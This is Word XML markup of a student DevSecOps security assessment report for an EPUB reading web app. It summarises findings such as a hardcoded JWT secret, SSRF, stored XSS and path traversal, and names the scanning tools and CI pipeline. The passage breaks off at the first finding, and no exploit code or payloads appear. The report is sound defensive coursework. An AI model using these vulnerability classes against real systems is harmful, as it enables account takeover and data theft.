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465071">
      <w:pPr>
        <w:spacing w:before="2400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A380C75">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>THE SHELF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31603A43">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2980B9"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DevSecOps Security Assessment Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448F7089">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability Discovery, Exploitation &amp; Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FD24F9">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Course: Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1C1E0B">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Institution: Habib University DSSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC85BBA">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Group: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jotesh Kumar, Taha Hunaid, Qasim Shakir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A07056">
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F6AAAF8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A784F8B">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This report presents the complete security assessment of The Shelf, a MERN-stack EPUB reading platform, conducted over a four-week DevSecOps project lifecycle. The assessment combined automated tooling (SAST, SCA, DAST) with manual penetration testing to identify, exploit, and remediate security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620608BC">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1527B485">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1.1 Key Findings at a Glance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500"/>
        <w:gridCol w:w="5860"/>
      </w:tblGrid>
      <w:tr w14:paraId="7527E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6C8344E7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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4AE96D02">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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2D1B586F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6C8C7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tcPr>
          <w:p w14:paraId="4D5D4102">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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882843">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</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50100C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hardcoded JWT secret, SSRF via EPUB proxy, stored XSS via malicious EPUB upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0CF2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729F4D85">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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0688A7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</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B64BC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable dependencies (axios, xmldom, react-router, epubjs), path traversal in file serve endpoints, weak PRNG for reset tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="68930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041EE9AE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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BB9D3C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8</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163D07">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Broken CSP (wildcard, unsafe-eval, unsafe-inline), missing clickjacking protection, mass assignment, NoSQL injection potential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="444A6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tcPr>
          <w:p w14:paraId="49FB136B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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B69BE9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6</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16C4A3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing security headers (COEP, COOP, CORP, Permissions-Policy, X-Content-Type-Options), X-Powered-By information leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1A319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D6EAF8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="62726390">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3498DB"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>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954A52">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</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85BA16">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Base64 disclosure, missing Sec-Fetch headers, non-cacheable content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B25FCFC">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F5E9ED">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The automated DevSecOps pipeline (GitHub Actions) runs SAST, SCA, and DAST on every push to the main branch. The SCA quality gate correctly fails the build when critical or high severity dependency vulnerabilities are detected, enforcing a security-first development workflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68450E58">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222984A5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1.2 Risk Summary for Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A809105">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If deployed to production in its current state, The Shelf would be vulnerable to complete authentication bypass (any user can forge admin credentials), server-side request forgery (the server can be tricked into accessing internal network resources), and persistent cross-site scripting (malicious content embedded in books could steal every reader's login session). These issues are all fixable with targeted code changes detailed in Section 6 of this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4ED44">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6CA8FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF357E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2.1 Tools Used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000"/>
        <w:gridCol w:w="5860"/>
      </w:tblGrid>
      <w:tr w14:paraId="566DB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1F646949">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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3928E8D2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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0E7DD6AB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1744F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495AF4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SCA</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AA9A51">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>npm audit</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8906CA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scan package-lock.json for known CVEs in Node.js dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="33E64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2D2488">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SAST</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800EE5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Semgrep OSS</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D05C10">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Static analysis of server.ts and React components for security anti-patterns (p/nodejs, p/jwt, p/xss rulesets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2DB3B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89B8F3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST</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B12F56">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP ZAP 2.16</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203DB7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Baseline scan against running application; spider + passive scan of HTTP responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E409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4928CD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>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CF5EBE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source code review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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4943BB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual review of server.ts (892 lines) for business logic flaws, auth bypass, SSRF, injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EBF5E2A">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F58A614">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2.2 Pipeline Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE63D10">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All three automated stages (SCA, SAST, DAST) are integrated into a GitHub Actions workflow (.github/workflows/security-pipeline.yml) that triggers on every push to main. SCA and SAST run in parallel; DAST spins up the application with a MongoDB service container and runs ZAP against localhost:3000. Reports are stored as pipeline artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4B1EB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF6552D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>3. Application Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5A878F">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Shelf is a three-tier MERN-stack web application. The React SPA communicates with an Express.js API server, which connects to MongoDB and the local filesystem. A detailed architecture analysis and threat model (STRIDE + DREAD) is provided in the companion document: Threat_Model_The_Shelf.docx.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2DDD77">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5524500" cy="386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524500" cy="3867150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A9938E">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figure 1: Data Flow Diagram with trust boundaries (from Threat Model document).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B42835">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A99C812">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4. Vulnerability Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC7AAC">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This section documents all findings from automated and manual testing, organized by severity. Each finding includes OWASP Top 10 mapping, CWE reference, CVSS score, reproduction steps, recommended fix, and remediation status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECAC00E">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378FED2C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4.1 Critical Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B9F94">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CF146E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-001: Hardcoded JWT Secret Default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F433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3DBB15">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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841A5B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2DA73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F78FAE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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917E70">
